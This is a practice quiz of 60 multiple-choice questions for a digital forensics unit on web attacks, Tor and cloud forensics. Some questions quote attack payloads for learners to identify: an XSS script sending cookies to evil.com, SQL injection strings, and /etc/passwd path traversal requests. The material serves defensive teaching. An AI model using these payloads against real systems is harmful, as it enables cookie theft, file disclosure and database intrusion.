Unit 5: Web Attacks, Dark Web and Cloud Forensics - Practice Quiz

CSC303 — Digital Forensics 60 Questions
0 Correct 0 Wrong 60 Left
0/60

1 What is the primary goal of web application forensics?

Understand web application forensics Easy
A. Investigating attacks and tracing the source of web application incidents
B. Improving website loading speed for users
C. Writing marketing content for web pages
D. Designing new user interfaces for websites

2 IIS logs are generated by web servers running on which operating system?

Understand Internet Information Services (IIS) logs Easy
A. Linux
B. macOS
C. Windows
D. Android

3 What is the default log file format used by modern IIS servers?

Understand Internet Information Services (IIS) logs Easy
A. W3C Extended Log File Format
B. CSV Comma Format
C. XML Trace Format
D. JSON Log Format

4 Which Apache log file records details of every request made to the web server?

Understand Apache web server logs Easy
A. Boot log
B. Firewall log
C. Access log
D. Kernel log

5 Which Apache log file is used to record diagnostic information and processing errors?

Understand Apache web server logs Easy
A. Agent log
B. Error log
C. Referer log
D. Access log

6 What is the main function of an Intrusion Detection System (IDS)?

Understand the functionality of intrusion detection system (IDS) Easy
A. Store backups of website databases
B. Encrypt all outgoing email messages
C. Increase internet bandwidth for users
D. Monitor network traffic and alert on suspicious activity

7 Which type of IDS detection relies on known attack patterns to identify threats?

Understand the functionality of intrusion detection system (IDS) Easy
A. Signature-based detection
B. Bandwidth-based detection
C. Password-based detection
D. Location-based detection

8 A Web Application Firewall (WAF) primarily protects against attacks at which layer?

Understand the functionality of web application firewall (WAF) Easy
A. Physical layer
B. Transport layer only
C. Application layer
D. Data link layer

9 Which of the following attacks is a WAF specifically designed to help block?

Understand the functionality of web application firewall (WAF) Easy
A. SQL injection
B. Hardware overheating
C. Physical theft of servers
D. Power supply failure

10 When investigating web attacks on a Windows-based server, which log source is most useful?

Investigate web attacks on windows-based servers Easy
A. IIS logs
B. Cron job logs
C. Apache access logs
D. Systemd journal

11 Which attack involves injecting malicious scripts into web pages viewed by other users?

Detect and investigate various attacks on web applications Easy
A. Denial of storage
B. Cable tapping
C. Cross-Site Scripting (XSS)
D. Cold boot attack

12 A SQL injection attack primarily targets which component of a web application?

Detect and investigate various attacks on web applications Easy
A. Keyboard
B. Monitor
C. Database
D. Printer

13 What best describes the dark web?

Understand the dark web Easy
A. The most visited social media platforms
B. A backup copy of the public internet
C. Websites indexed by common search engines
D. Hidden part of the internet accessible only through special software

14 Which software is most commonly used to access the dark web anonymously?

Understand the dark web Easy
A. Windows Explorer
B. Tor browser
C. Microsoft Word
D. Adobe Reader

15 During an investigation, the presence of which file or folder can indicate the use of the Tor browser?

Determine how to identify the traces of tor browser during investigation Easy
A. System32 folder
B. Recycle Bin folder
C. Downloads folder only
D. Tor Browser installation folder

16 What does the Tor network use to provide anonymity to its users?

Perform Tor browser forensics Easy
A. A single direct connection to the server
B. Physical mail routing
C. Multiple relay nodes with layered encryption
D. Plain text transmission only

17 Which cloud service model provides virtualized computing resources such as servers and storage over the internet?

Understand the basic cloud computing concepts Easy
A. Antivirus as a Service
B. Cable as a Service
C. Infrastructure as a Service (IaaS)
D. Hardware as a Product

18 What is a key challenge in cloud forensics compared to traditional forensics?

Understand cloud forensics Easy
A. Cloud data is always physically local
B. Data may be distributed across multiple locations and jurisdictions
C. Cloud systems never generate logs
D. There is no data stored in the cloud

19 Which AWS service provides scalable object storage?

Understand the fundamentals of Amazon Web Services (AWS) Easy
A. Amazon Word
B. Amazon Cron
C. Amazon Kernel
D. Amazon S3

20 Which AWS service records API calls and is useful for investigating security incidents?

Determine how to investigate security incidents in AWS Easy
A. AWS CloudTrail
B. AWS Notepad
C. AWS Speaker
D. AWS Wallpaper

21 During an investigation, an analyst finds an IIS log entry with sc-status 200 and sc-substatus 0. What does this combination indicate about the request?

Understand Internet Information Services (IIS) logs Medium
A. The request was blocked by an authentication filter because the client repeatedly supplied invalid credentials over multiple sessions
B. The request was successfully processed by the server
C. The request was redirected to another resource
D. The request failed due to a server-side error

22 An Apache access.log line ends with "GET /admin.php?id=1' OR '1'='1 HTTP/1.1" 200 512. Which attack does this most likely represent?

Understand Apache web server logs Medium
A. Denial of service
B. SQL injection
C. Cross-site scripting
D. Directory traversal

23 While performing web application forensics, why is it important to preserve the server's system time and timezone configuration?

Understand web application forensics Medium
A. To correctly correlate log timestamps across multiple sources during timeline reconstruction
B. To automatically translate log entries into the investigator's local language
C. To improve the performance of the web server
D. To reduce the size of the collected log files

24 A signature-based IDS fails to detect a newly released zero-day exploit. What is the primary reason for this limitation?

Understand the functionality of intrusion detection system (IDS) Medium
A. The exploit used encrypted HTTPS traffic that the IDS decrypted
B. No matching signature exists in its database for the new exploit
C. The IDS was configured in inline blocking mode
D. The IDS relies solely on behavioral anomaly baselines built over time from network traffic

25 A WAF operating in a positive security model would handle incoming requests by:

Understand the functionality of web application firewall (WAF) Medium
A. Allowing only requests that match a defined whitelist of acceptable behavior
B. Logging all traffic without taking any blocking action
C. Forwarding all requests to an IDS for secondary inspection before allowing them to reach the application
D. Blocking only requests matching known attack signatures

26 On a Windows-based web server, which log source is most useful for correlating a suspicious IIS request with a subsequent failed administrative login?

Investigate web attacks on windows-based servers Medium
A. Windows Registry hives
B. The IIS applicationHost.config file
C. Windows Security Event Log
D. The prefetch folder

27 An analyst observes a request containing <script>document.location='http://evil.com/c?'+document.cookie</script>. Which attack is being attempted?

Detect and investigate various attacks on web applications Medium
A. SQL injection
B. Cross-site scripting (XSS)
C. Command injection
D. Session fixation

28 A web log shows repeated requests such as GET /../../../../etc/passwd. This is characteristic of which attack?

Detect and investigate various attacks on web applications Medium
A. Directory (path) traversal
B. Buffer overflow
C. Clickjacking
D. Cross-site request forgery

29 Which statement best describes how content is typically accessed on the dark web?

Understand the dark web Medium
A. Through anonymizing overlay networks such as Tor using special addresses
B. Through standard search engines like Google with normal URLs
C. Through cloud provider consoles that require multi-factor authentication and signed API requests
D. Only via a physical direct connection to hosting servers

30 Which artifact is a strong indicator that the Tor Browser was installed on a Windows system?

Determine how to identify the traces of tor browser during investigation Medium
A. The default Internet Explorer history database
B. Presence of the Tor Browser folder and tor.exe executable
C. A large number of entries in the DNS resolver cache
D. Multiple restore points created by System Protection over several months

31 Why is memory (RAM) analysis particularly valuable when performing Tor Browser forensics?

Perform Tor browser forensics Medium
A. Memory always contains the plaintext private keys of every Tor relay used in the circuit path
B. RAM contains the only copy of the Tor network's routing tables
C. The Tor Browser stores all its history permanently in an encrypted disk file
D. Visited .onion URLs and browsing artifacts may reside in memory even though they are not saved to disk

32 In the shared responsibility model, which task is typically the customer's responsibility in an IaaS deployment?

Understand the basic cloud computing concepts Medium
A. Ensuring the redundancy of the underlying network hardware fabric
B. Maintaining the physical security of the data center
C. Managing the hypervisor software
D. Securing the guest operating system and applications they install

33 What is one of the biggest challenges unique to cloud forensics compared to traditional forensics?

Understand cloud forensics Medium
A. The inability to ever collect volatile memory from any system
B. The complete absence of any logging capabilities in the cloud
C. Limited physical access to hardware and multi-tenant data commingling
D. The requirement that all evidence be printed on paper before it can be admitted

34 Which AWS service provides object storage where data is stored in buckets?

Understand the fundamentals of Amazon Web Services (AWS) Medium
A. Amazon VPC
B. Amazon S3
C. Amazon EC2
D. Amazon RDS

35 An investigator needs a record of all API calls made within an AWS account, including who made the call and when. Which service should they examine?

Determine how to investigate security incidents in AWS Medium
A. AWS CloudTrail
B. AWS Trusted Advisor
C. Amazon Route 53
D. Amazon CloudWatch Metrics

36 To capture the volatile state of a compromised EC2 instance for forensic analysis, which action best preserves evidence?

Determine how to investigate security incidents in AWS Medium
A. Immediately terminate the instance to stop the attacker
B. Change the instance security group and continue normal operations without imaging anything
C. Create a snapshot of the EBS volume and acquire a memory image before termination
D. Reboot the instance to clear any malicious processes

37 In Microsoft Azure, which service is used to centrally manage identities and control access to resources?

Understand the fundamentals of Microsoft Azure Medium
A. Azure Virtual Network
B. Azure Blob Storage
C. Azure Load Balancer
D. Microsoft Entra ID (Azure Active Directory)

38 Which Azure log source records control-plane operations such as creating or deleting resources within a subscription?

Determine how to investigate security incidents in Azure Medium
A. Azure Activity Log
B. Azure Boot Diagnostics
C. Azure Application Insights traces
D. Azure Advisor recommendations

39 An investigator wants to review sign-in attempts and identity-related risk events in Azure. Which logs should they primarily analyze?

Determine how to investigate security incidents in Azure Medium
A. Azure Network Watcher packet captures
B. Microsoft Entra ID sign-in and audit logs
C. Azure Cost Management reports
D. Azure Resource Health status logs

40 Why is acquiring forensic evidence from containers challenging compared to traditional virtual machines?

Understand forensic methodologies for containers and microservices Medium
A. Containers cannot generate any log output at all
B. Containers are ephemeral and may be destroyed and recreated, losing state quickly
C. Containers always run on dedicated physical servers isolated from any orchestration platform
D. Containers permanently store all runtime data on external tape backups

41 An investigator analyzing IIS W3C logs notices that the sc-status field shows 200 while the sc-substatus shows 0, but the cs-uri-stem contains /admin/config.php on a server that runs only ASP.NET. Which conclusion is most defensible?

Understand Internet Information Services (IIS) logs Hard
A. IIS automatically blocks .php files, so sc-status 200 indicates a false log entry
B. The request was logged as successful but likely served a static/handler-mapped response, warranting review of handler mappings and possible file upload
C. The sc-substatus 0 proves the request was rejected before reaching the application layer
D. The request succeeded and returned the resource, so the PHP file was executed by IIS

42 In an Apache combined log, an investigator sees repeated entries: GET /index.php?id=1%27%20UNION%20SELECT%20... returning status 200 with a large bytes value that differs across requests. What is the strongest interpretation?

Understand Apache web server logs Hard
A. The 200 status guarantees the queries failed silently at the database
B. The WAF blocked the requests, hence the varying byte counts
C. URL-encoded quotes always indicate a benign search operation
D. A successful UNION-based SQL injection is likely exfiltrating differing data per request

43 A network IDS using signature-based detection fails to flag a novel polymorphic web shell, while an anomaly-based IDS raises an alert. Which statement best explains the difference and its forensic implication?

Understand the functionality of intrusion detection system (IDS) Hard
A. Anomaly IDS detected deviation from baseline behavior; its alert may have higher false-positive risk but caught the unknown threat
B. Anomaly IDS relies solely on known signatures, explaining the earlier miss
C. Both systems must be misconfigured since polymorphic code is undetectable by design
D. Signature IDS is superior because it never generates false positives during investigation

44 During an investigation, logs show a WAF operating in 'detection-only' (monitoring) mode logged an XSS attempt but the payload still reached the application. Which is the correct forensic conclusion?

Understand the functionality of web application firewall (WAF) Hard
A. The WAF signature database was corrupted, allowing all traffic through
B. Detection mode encrypts payloads, so the logged attack cannot be trusted
C. In monitoring mode the WAF logs but does not block, so the request reaching the app is expected behavior
D. The WAF was bypassed via encoding, since detection mode always blocks confirmed attacks

45 On a compromised Windows/IIS server, an investigator finds a new scheduled task created shortly after suspicious IIS log entries and a corresponding 4698 event in the Security log. What does correlating these artifacts most strongly indicate?

Investigate web attacks on windows-based servers Hard
A. The scheduled task caused the IIS entries by generating web traffic
B. Establishment of persistence following the web exploitation, linking the web vector to host-level compromise
C. Event 4698 proves the attacker had physical console access
D. Routine Windows Update installed the task automatically

46 An investigator observes a request GET /profile?file=....//....//....//etc/passwd that succeeded. What attack and evasion technique are demonstrated?

Detect and investigate various attacks on web applications Hard
A. Path/directory traversal using nested-sequence obfuscation to bypass naive ../ filtering
B. Server-side request forgery targeting internal metadata
C. Cross-site request forgery via forged referer
D. SQL injection using comment obfuscation

47 While reconstructing a multi-stage web attack, an investigator must establish the sequence of events across the reverse proxy, WAF, and application server, each in a different timezone. What is the most critical first step?

Understand web application forensics Hard
A. Normalize all timestamps to a single reference (e.g., UTC) to build an accurate timeline
B. Convert all logs to PDF to preserve them as evidence
C. Delete duplicate log entries to reduce noise before correlation
D. Trust the application server clock as authoritative and ignore the others

48 An investigator encounters a .onion v3 address that is 56 characters long. Compared to legacy v2 addresses, what does the v3 format primarily improve, and why does length matter forensically?

Understand the dark web Hard
A. It embeds the operator's IP in the address for easier tracing
B. It uses stronger elliptic-curve cryptography with longer public-key-derived addresses, resisting deanonymization and enumeration
C. It uses shorter hashes for faster indexing by search engines
D. It removes encryption to comply with legal intercept requirements

49 On a suspect's Windows machine with no Tor Browser present, an investigator wants to determine if it was ever run. Which artifact combination is most reliable?

Determine how to identify the traces of tor browser during investigation Hard
A. The default browser setting in Internet Options
B. Prefetch files, registry MUICache/UserAssist, and $MFT/USN journal remnants referencing tor.exe or firefox.exe from the bundle
C. Only the current contents of C:\Program Files
D. The live network connections shown by netstat

50 During Tor Browser forensics, an investigator finds the browser was closed normally, yet recovers browsing remnants from a memory dump taken while it was running. Why is memory analysis often the most productive approach?

Perform Tor browser forensics Hard
A. Tor Browser is designed to leave minimal disk artifacts, so decrypted URLs, keys, and page content reside primarily in volatile memory during execution
B. Memory dumps are legally required before any disk imaging
C. Tor Browser writes all history to disk in plaintext by default
D. The disk cache retains full session data for 30 days

51 In a PaaS deployment, a data breach occurs due to a vulnerability in the customer's application code. Under the shared responsibility model, who is primarily accountable, and why?

Understand the basic cloud computing concepts Hard
A. Both share equal legal liability regardless of the vulnerability's location
B. The customer, because in PaaS the customer is responsible for their own application and data despite the provider managing the platform
C. Neither, since PaaS eliminates all customer security duties
D. The cloud provider, because they own the underlying runtime and OS

52 A forensic examiner needs to acquire a running EC2 instance's volatile data but cannot install tools due to chain-of-custody concerns about altering the system. Which approach best balances evidentiary integrity with data capture?

Understand cloud forensics Hard
A. Reboot the instance to flush data into persistent logs
B. Take an EBS snapshot and, where supported, capture memory via the hypervisor/provider mechanism to minimize footprint on the guest
C. Delete the instance and restore from backup for analysis
D. Change the security group rules to isolate then format the volume

53 An investigator wants a complete record of API calls (who, what, when) made against AWS resources during an incident. Which service is the authoritative source, and what is a key limitation to verify?

Understand the fundamentals of Amazon Web Services (AWS) Hard
A. Amazon CloudWatch metrics; verify the retention period is unlimited by default
B. AWS Config; verify it captures raw network packets
C. Amazon Inspector; verify it records user login passwords
D. AWS CloudTrail; verify it was enabled in all regions and logs were not tampered with (e.g., log file validation)

54 During an AWS incident, CloudTrail shows AssumeRole events from an unfamiliar external account ID immediately before sensitive S3 GetObject calls. What does this pattern most likely indicate?

Determine how to investigate security incidents in AWS Hard
A. S3 automatically assumes roles for encryption, which is expected
B. Normal cross-service AWS internal operation requiring no action
C. A DNS misconfiguration causing spurious log entries
D. Potential cross-account role abuse where an attacker leveraged a misconfigured trust policy to access S3 data

55 An investigator must determine which identities authenticated and what conditional access decisions applied during an Azure AD (Entra ID) compromise. Which log source is authoritative?

Understand the fundamentals of Microsoft Azure Hard
A. Azure AD Sign-in logs, which capture authentication events, MFA status, and conditional access outcomes
B. Azure Activity Log, which records control-plane resource operations only
C. Azure Network Watcher flow logs, which record sign-in credentials
D. Azure Monitor autoscale logs, which track user password changes

56 In Azure, an investigator sees a VM was accessed and suspects the disk must be preserved without stopping ongoing analysis. What is the recommended evidence-preservation method for the managed disk?

Determine how to investigate security incidents in Azure Hard
A. Resize the disk to force Azure to archive the original
B. Delete the VM to freeze its state permanently
C. Create a snapshot of the managed disk and copy it to an isolated, access-controlled storage account with a hash for integrity
D. Enable Azure Bastion to capture keystrokes retroactively

57 An investigator must analyze a compromised container that has already been terminated in a Kubernetes cluster with ephemeral pods. What is the fundamental forensic challenge and best mitigation?

Understand forensic methodologies for containers and microservices Hard
A. Kubernetes retains full container memory indefinitely, so no mitigation is needed
B. Containers store all forensic data on the node's BIOS; mitigate by dumping firmware
C. Containers cannot be investigated at all, so only the host OS matters
D. Ephemeral, immutable containers lose state on termination; mitigate with centralized logging, image registries, and runtime telemetry captured beforehand

58 An IIS log shows many requests with sc-status 500 and sc-win32-status 64. How should an investigator interpret the sc-win32-status value in this forensic context?

Understand Internet Information Services (IIS) logs Hard
A. It represents the number of bytes lost during the request
B. It is the HTTP status duplicated, so both fields mean server error
C. It is a Windows system error code (64 = 'The specified network name is no longer available'), giving OS-level context to the failure
D. It indicates 64 successful authentication attempts

59 An investigator compares an Apache access_log and error_log. A request appears in access_log with status 404, but there is no corresponding error_log entry. What is the correct interpretation?

Understand Apache web server logs Hard
A. Apache always logs 404 responses to error_log at LogLevel warn
B. A 404 is a normal HTTP response logged in access_log; error_log only records server-side errors/diagnostics per the LogLevel, so absence is expected
C. The missing error entry proves log tampering occurred
D. The 404 must be fabricated because every access entry has an error entry

60 Web logs show a rapid burst of POST /login requests from many distinct IPs, each with a different username but a small recurring set of passwords, all returning 200. Which attack is indicated and what distinguishes it?

Detect and investigate various attacks on web applications Hard
A. Brute force, distinguished by exhaustively trying all passwords on a single account
B. Credential stuffing, distinguished by reusing leaked credential pairs against one account
C. Session fixation, distinguished by reusing a fixed session token
D. Password spraying, distinguished by trying a few common passwords across many accounts to evade lockout thresholds